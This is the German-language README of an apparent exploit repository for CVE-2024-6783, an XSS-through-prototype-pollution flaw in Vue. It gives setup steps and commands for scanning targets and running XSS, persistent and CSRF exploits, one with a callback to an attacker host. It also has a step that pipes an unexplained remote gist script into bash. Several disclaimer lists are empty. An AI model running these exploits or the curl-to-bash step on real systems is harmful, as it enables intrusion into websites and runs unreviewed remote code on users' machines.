
CVE-2024-6783 - Vue CVE
In Vue wurde eine Schwachstelle entdeckt, die es einem Angreifer ermöglicht, XSS über Prototype Pollution auszuführen. Der Angreifer könnte die Prototypenkette einiger Eigenschaften wie Object.prototype.staticClass oder Object.prototype.staticStyle ändern, um beliebigen JavaScript-Code auszuführen.
Unterstützen Sie die Wartung dieses Projekts mit PayPal oder durch Scannen des untenstehenden QR-Codes.
Verwenden Sie dieses Projekt nur in sicheren und autorisierten Umgebungen wie:
Beispiel-Setup:
git clone https://github.com/HORKimhab/CVE-2024-6783
cd CVE-2024-6783
# Project use python follow below
# Create a virtual environment
python -m venv venv
# Activate the virtual environment
# macOS / Linux
source venv/bin/activate
# Windows (Git Bash / WSL)
source venv/Scripts/activate
# Install requirments
pip install -r requirements.txt
Beispielverwendung:
# scan only
python cve-2024-6783.py -u https://example.com -v
# Scan & XSS Exploit
python cve-2024-6783.py -u https://example.com -e xss
# XSS Exploit with Callback
python cve-2024-6783.py -u https://example.com -e xss -c http://attacker-server.com/callback
# Automatic Callback Server
python cve-2024-6783.py -u https://example.com -e persistent -c auto
# CSRF Exploitation
python cve-2024-6783.py -u https://example.com -e csrf
# Full Scan and Exploit with Verbose Output
python cve-2024-6783.py -u https://example.com -e xss -c auto -v -o evidence.html
Hinweis:
curl -fsSL https://gist.githubusercontent.com/HORKimhab/24c89ee9a86a42aac88381334f8bfe48/raw | bash -s -- -y ausführen, um das verschachtelte Verzeichnis .git zu entfernenEin Repository zum Lernen, Testen und Erforschen von Cybersicherheitskonzepten in kontrollierten Umgebungen.
Dieses Repository dient ausschließlich der Ausbildung und autorisierten Sicherheitsforschung.
Es soll Nutzern dabei helfen, Folgendes zu lernen:
Verwenden Sie dieses Repository nur in Umgebungen, für die Sie eine Genehmigung haben, wie zum Beispiel:
Unbefugte oder illegale Nutzung ist strengstens untersagt.
Die Autoren und Mitwirkenden sind nicht verantwortlich für Schäden, Missbrauch, rechtliche Probleme oder Verluste, die durch dieses Projekt verursacht werden.
Durch die Nutzung dieses Repositorys stimmen Sie zu, dass:
Dieses Projekt ist vorgesehen für:
Bitte befolgen Sie Praktiken der verantwortungsvollen Offenlegung und halten Sie alle geltenden Gesetze ein.
Für verantwortungsvolle Offenlegung oder Zusammenarbeit kontaktieren Sie den Repository-Maintainer über GitHub.